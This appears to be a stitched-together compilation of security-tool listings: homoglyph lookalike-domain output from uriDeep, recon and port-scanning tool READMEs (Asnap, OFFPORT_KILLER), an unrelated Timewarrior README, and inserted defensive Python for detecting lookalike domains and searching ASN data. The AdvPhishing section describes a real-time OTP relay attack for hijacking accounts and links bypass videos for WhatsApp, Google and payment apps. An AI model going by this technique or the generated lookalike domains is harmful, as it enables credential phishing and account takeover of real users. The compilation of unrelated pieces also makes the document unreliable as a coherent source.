    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝔭le.org'}
    {'domain_punnycode': b'www.xn--exampe-fjc.org', 'domain': 'www.exampȊe.org'}
    {'domain_punnycode': b'www.xn--exampl-u739a.org', 'domain': 'www.exampl𐐔.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝘐e.org'}

    mindcrypt@kali:~/tool/uriDeep# python3 uriDeep.py -l -H -d www.example.org

    _ ___
    /\ /\ _ __(_) / \___ ___ _ __
    / / \ \ '__| | / /\ / _ \/ _ \ '_ \
    \ \_/ / | | |/ /_// __/ __/ |_) |
    \___/|_| |_/___,' \___|\___| .__/
    |_|

    Version Beta
    Authors: Alfonso Muñoz (@mindcrypt)
    Miguel Hernández (@MiguelHzBz)

    Domain target: www.example.org
    Option selected: Homoglyph attack
    Option selected: Lite confusables
    Generate similar domains...
    Similars domains to example: 5
    {'domain': 'www.exąmple.org', 'domain_punnycode': b'www.xn--exmple-x0a.org'}
    {'domain': 'www.examplę.org', 'domain_punnycode': b'www.xn--exampl-14a.org'}
    {'domain': 'www.exampļe.org', 'domain_punnycode': b'www.xn--exampe-0cb.org'}
    {'domain': 'www.ęxample.org', 'domain_punnycode': b'www.xn--xample-v4a.org'}
    {'domain': 'www.example.org', 'domain_punnycode': b'www.example.org'}
    root@kali:~/tool/uriDeep#
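The defensive counterpart of the run above, as an added example that is not part of uriDeep: it decodes observed hostnames from their `xn--` form and flags those whose de-accented, script-folded "skeleton" equals the protected domain. The `CROSS_SCRIPT` map, the function names and the sample query list are assumptions made for this illustration; a production check would load the full Unicode confusables data.

```python
import unicodedata

PROTECTED = "example.org"  # the domain being defended (the target used in the run above)

# Constructed, deliberately small cross-script map (assumption: real deployments
# would use the complete Unicode confusables table instead of this excerpt).
CROSS_SCRIPT = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u03b1": "a",  # GREEK SMALL LETTER ALPHA
    "\u03b5": "e",  # GREEK SMALL LETTER EPSILON
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
    "\u03c1": "p",  # GREEK SMALL LETTER RHO
}

# Constructed list of observed hostnames (for example from DNS or proxy logs).
# The four xn-- names are the ones printed by the uriDeep run above.
SAMPLE_QUERIES = [
    "www.example.org",
    "www.xn--exmple-x0a.org",
    "www.xn--exampl-14a.org",
    "www.xn--exampe-0cb.org",
    "www.xn--xample-v4a.org",
    "www.exampl\u0435.org",  # constructed: Cyrillic "ie" given in Unicode form
    "mail.example.net",
]


def to_unicode(hostname):
    """Return the Unicode form of a hostname, or None if its punycode is invalid."""
    try:
        raw = hostname.encode("ascii")
    except UnicodeEncodeError:
        return hostname  # already contains non-ASCII characters
    try:
        return raw.decode("idna")  # decodes every xn-- label
    except UnicodeError:
        return None


def skeleton(name):
    """Fold a name to the ASCII string a reader is likely to perceive."""
    folded = []
    for ch in unicodedata.normalize("NFKD", name).lower():
        if unicodedata.combining(ch):
            continue  # drop accents, ogoneks, cedillas and similar marks
        folded.append(CROSS_SCRIPT.get(ch, ch))
    return "".join(folded)


def matches(name, domain):
    """True if name is the domain itself or one of its subdomains."""
    return name == domain or name.endswith("." + domain)


def classify(hostname):
    """Label a hostname as legitimate, lookalike, unrelated or undecodable."""
    uni = to_unicode(hostname.rstrip("."))
    if uni is None:
        return {"host": hostname, "unicode": None, "verdict": "undecodable"}
    if matches(uni.lower(), PROTECTED):
        verdict = "legitimate"
    elif matches(skeleton(uni), PROTECTED):
        verdict = "lookalike"  # differs from the real name but reads the same
    else:
        verdict = "unrelated"
    return {"host": hostname, "unicode": uni, "verdict": verdict}


def scan(hostnames):
    """Return the classification records of all lookalike hostnames."""
    return [r for r in map(classify, hostnames) if r["verdict"] == "lookalike"]


if __name__ == "__main__":
    for record in scan(SAMPLE_QUERIES):
        print(record["host"], "->", record["unicode"])
```

Accented variants are caught by Unicode decomposition alone; only cross-script letters depend on the map, so the map's coverage bounds what this check can detect.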



    Asnap - Tool To Render Recon Phase Easier By Providing Updated Data About Which Companies Owns Which Ipv4 Or Ipv6 Addresses



    Asnap aims to make the recon phase easier by providing regularly updated data about which companies own which IPv4 or IPv6 addresses, and it allows the user to automate initial port and service scanning.


    █████╗ ███████╗███╗   ██╗ █████╗ ██████╗ 
    ██╔══██╗██╔════╝████╗ ██║██╔══██╗██╔══██╗
    ███████║███████╗██╔██╗ ██║███████║██████╔╝
    ██╔══██║╚════██║██║╚═█╗██║██╔══██║██╔═══╝
    ██║ ██║███████║██║ ╚████║██║ ██║██║
    ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝
    Author : Mehmet Berkay Yuksel | twitter -> @paradoxxer


     



    Installation

    Precompiled Binary

    If you have Go installed and configured in your $PATH environment variable, simply run:

    go get -u github.com/paradoxxer/asnap

    If you want to use the precompiled binary, you also need to download the "move.sh" and "nmap.sh" files and place them in the same directory as asnap.

    To download the database that asnap searches, you need to provide a key. To get your free key, sign up at https://www.maxmind.com/en/geolite2/signup. After signing up, navigate to services -> My license key and create a new key. Then create "asnap_conf.txt" in the same directory as asnap and paste your key on the first line of "asnap_conf.txt":

    echo 'insert key' > asnap_conf.txt 

    To use the port scanning functionality, you need to install nmap on your machine:

    * Debian Based Distros:
    sudo apt install nmap
    * MacOS
    brew install nmap
    * Arch Based Distros
    sudo pacman -S nmap

    Build Yourself (Recommended)

    Download the source code:

    git clone git@github.com:paradoxxer/asnap.git

    Install golang here -> https://golang.org/doc/install or you can install go if it is available in your package manager:

    sudo apt install golang

    After downloading the source code, navigate to the project directory and run:

    go build

    This produces the asnap binary. After you build it, create asnap_conf.txt in the same directory as asnap, insert your key on the first line, and you are good to go.

    echo 'insert key' > asnap_conf.txt 

    Usage and Examples

    Usage of ./asnap:
    -download Download database for the first usage.
    -update Update downloaded database. (Geolite databases updates once a week.).
    -search Specify search.
    -ipv4 Specify ipv4 database to search.
    -ipv6 Specify ipv6 database to search.
    -company Search by company name.
    -asn Search by as number.
    -outfile Specifies a name for the output text. By default, output file is named: MM-DD-YYYY_out.txt
    -infile Use specified .txt file as input. Asnap will iterate every line, and treats them as company names and searches specified database with given inputs.
    -nmap Passes found ip addresses to nmap.

    Examples:
    "$asnap -download" -> Downloads database with given key, for the first time.
    "$asnap -update" -> Updates database.
    "$asnap -search -ipv4 -company="example" " -> Search ipv4 database by company name "example"
    "$asnap -search -ipv6 -asn 13337" -> Search ipv6 database by as number "13337"
    "$asnap -search -ipv4 -company="github" -outfile /path/to/output/file" -> Search ipv4 database by company name "github" and save output to specified path.
    "$asnap -search -ipv4 -infile /path/to/input/file.txt -nmap" -> Give a list of company names as input, search it inside ipv4 database and pass found ip addresses to nmap for port scanning.

    Use Cases:

    While you can use asnap manually, you can also automate the whole process with cron jobs (see -> https://en.wikipedia.org/wiki/Cron). For example, after you have supplied an input file with the -infile argument, all you have to do is check the output file and regularly modify the input file to suit your needs. By default, the output file is named "MM-DD-YYYY_out.txt".
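The company and AS-number searches described above can be reproduced for an inventory of your own organisation's address space with the short script below. It is an added example, not asnap's code: it assumes the column layout of MaxMind's GeoLite2-ASN-Blocks-IPv4.csv, and the sample rows are constructed from documentation-reserved networks and AS numbers.

```python
import csv
import io
import ipaddress

# Constructed sample in the column layout of GeoLite2-ASN-Blocks-IPv4.csv.
# Networks and AS numbers are taken from the ranges reserved for documentation.
SAMPLE_CSV = """\
network,autonomous_system_number,autonomous_system_organization
192.0.2.0/25,64500,Example Networks Ltd
192.0.2.128/25,64500,Example Networks Ltd
198.51.100.0/24,64501,"Sample Hosting, Inc."
203.0.113.0/24,64502,Example Cloud
"""


def load_blocks(handle):
    """Parse the CSV into dicts with a typed network, AS number and organisation."""
    blocks = []
    for row in csv.DictReader(handle):
        blocks.append({
            "network": ipaddress.ip_network(row["network"]),
            "asn": int(row["autonomous_system_number"]),
            "org": row["autonomous_system_organization"],
        })
    return blocks


def load_sample():
    """Load the constructed sample embedded above."""
    return load_blocks(io.StringIO(SAMPLE_CSV))


def search(blocks, company=None, asn=None):
    """Filter by case-insensitive organisation substring and/or exact AS number."""
    needle = company.lower() if company else None
    hits = []
    for block in blocks:
        if asn is not None and block["asn"] != asn:
            continue
        if needle is not None and needle not in block["org"].lower():
            continue
        hits.append(block)
    return hits


def summarize(hits):
    """Group hits per (asn, org), merge adjacent networks and count addresses."""
    grouped = {}
    for block in hits:
        grouped.setdefault((block["asn"], block["org"]), []).append(block["network"])
    summary = {}
    for key, networks in grouped.items():
        merged = list(ipaddress.collapse_addresses(networks))
        summary[key] = {
            "networks": [str(net) for net in merged],
            "addresses": sum(net.num_addresses for net in merged),
        }
    return summary


if __name__ == "__main__":
    for (asn, org), info in summarize(search(load_sample(), company="example")).items():
        print(f"AS{asn} {org}: {info['networks']} ({info['addresses']} addresses)")
```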


    Follow Me:

    If you have a question or a feature that you want me to add feel free to contact me. twitter -> https://twitter.com/paradoxxer linkedin -> https://www.linkedin.com/in/mehmet-berkay-y%C3%BCksel-ab78aa153/ Web Site -> https://yukselberkay.me



    Timewarrior - Commandline Time Reporting



    Timewarrior is a time tracking utility that offers simple stopwatch features as well as sophisticated calendar-based backfill, along with flexible reporting. It is a portable, well supported and very active Open Source project.


    Installing

    From Package

    Thanks to the community, there are binary packages available here.


    Building Timewarrior

    Building Timewarrior yourself requires

    • git
    • cmake
    • make
    • C++ compiler, currently gcc 4.8.1+ or clang 3.3+ for full C++11 support
    • Python 3, for running the testsuite

    There are two ways to retrieve the Timewarrior sources:

    • Clone the repository from Github,

      git clone --recurse-submodules https://github.com/GothenburgBitFactory/timewarrior
      cd timewarrior
    • Or download the tarball with curl,

      curl -O https://taskwarrior.org/download/timew-1.3.0.tar.gz

      and expand the tarball

      tar xzf timew-1.3.0.tar.gz
      cd timew-1.3.0

    Build Timewarrior, optionally run the test suite (note: the tarball does not contain tests), and install it.

    cmake -DCMAKE_BUILD_TYPE=release
    make
    [make test]
    sudo make install

    This copies files into the right place (default under /usr/local), and installs man pages.

    Add the optional parameter -DCMAKE_INSTALL_PREFIX=/path/to/your/install/location to the cmake command if you want to install Timewarrior at a location other than /usr/local. The make install command may not require sudo depending on your choice of install location.


    Documentation

    There is extensive online documentation. You'll find all the details at timewarrior.net/docs/.

    There you will find the documentation, downloads, news and more.


    Contributing

    Your contributions are especially welcome. Whether it comes in the form of code patches, ideas, discussion, bug reports, encouragement or criticism, your input is needed.

    For support options, take a look at CONTRIBUTING.md or visit taskwarrior.org.

    Visit Github and participate in the future of Timewarrior.



    AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING



    This Is Advance Phishing Tool! OTP PHISHING



    SPECIAL OTP BYPASS VIDEO WORKED
    Social Media Hack | Link
    Installation Termux | https://www.youtube.com/watch?v=LO3hX1lLBjI
    Whatsapp OTP | https://www.youtube.com/watch?v=pyB63ym3QYs
    Google OTP | https://www.youtube.com/watch?v=MhSb4My1lZo
    Paytm OTP | https://www.youtube.com/watch?v=3TB_sISTw9U
    Instagram OTP | https://www.youtube.com/watch?v=VmkV1rrw2-w
    Phone Pay OTP | https://www.youtube.com/watch?v=ZgaoLubKBBo
    Telegram OTP | https://www.youtube.com/watch?v=BhGyGkIDhO0

    TECHNIQUE

    When the victim enters his credentials, you need to go to the original website and use those credentials to send a real OTP to the victim. Once he enters that OTP, it will also be there with you, and you will be allowed to log in to the account before him.


    SCREENSHOT ( KALI )




    INSTALLATION [ TERMUX APP --ANDROID ]

    INSTALLATION [ KALI ]

    AVAILABLE TUNNELLING OPTIONS
    1. LOCALHOST
    2. NGROK (https://ngrok.com/)

    TESTED ON FOLLOWING:-
    • Kali Linux - 2020.1a (version)
    • Parrot OS - Rolling Edition (version)
    • Ubuntu - 18.04 (version)
    • Arch Linux
    • Termux App

    PREREQUISITES
    • sudo - [ MUST ]
    • php
    • apache2
    • ngrok Token

    LANGUAGE
    • Bash Script

    Upcoming Contribution

    Royal Hackers


    Contact For Contribute & Issues
    EMAIL FOR ISSUES AND CONTRIBUTE : sg5479845@gmail.com

    DISCLAIMER
    TO BE USED FOR EDUCATIONAL PURPOSES ONLY

    The use of the Adv-Phishing is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.



    OFFPORT_KILLER - This Tool Aims At Automating The Identification Of Potential Service Running Behind Ports Identified Manually Either Through Manual Scan Or Services Running Locally



    #Manual Port Scanning #Enumerate Potential Service

    If you like the tool, and for my personal motivation to develop other tools, please give it a +1 star *


    INTRO

    This tool aims at automating the identification of potential services running behind ports identified manually, or of services running locally only.

    The tool is useful:

    1. when nmap or any other scanning tool is not available, you did a manual port scan, and you then want to identify the services running behind the identified ports, and

    2. also if you have been able to identify services running locally (via netstat, running processes, SNMP or else).

    Several databases are used, such as those from NMAP, IANA and Linux machines.

    The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :).


    Usage

    Example
    ./OFFPORT_KILLER.sh -i inputfile.txt -r report.txt -e /tmp/

    Arguments
    • -i : input file (format IP:PORT)
    • -r : report name (save the output)
    • -h : help

    Steps
    • Step 1: Perform a manual port scan (using nc, tcpdump or whatever) or identify services running locally
    • Step 2: Create a file with format IP:PORT (where IP is the target IP address and PORT is a port identified).
    • Step 3: Run the tool with the file created using the argument -i

    Note: Create an entry for each port; several IPs can be included in the file.


    inputfile.txt
    192.168.1.12:1830
    192.168.1.12:7738
    192.168.1.14:22
    192.168.1.14:7738
    192.168.1.15:3465

    Output



    Read output

    To read the output while keeping its appearance (color), especially when cat is not adequate because the output is too long:

    • less -R report.txt

    Disclaimer

    This script is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (TH3xACE) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of the script is not my responsibility.


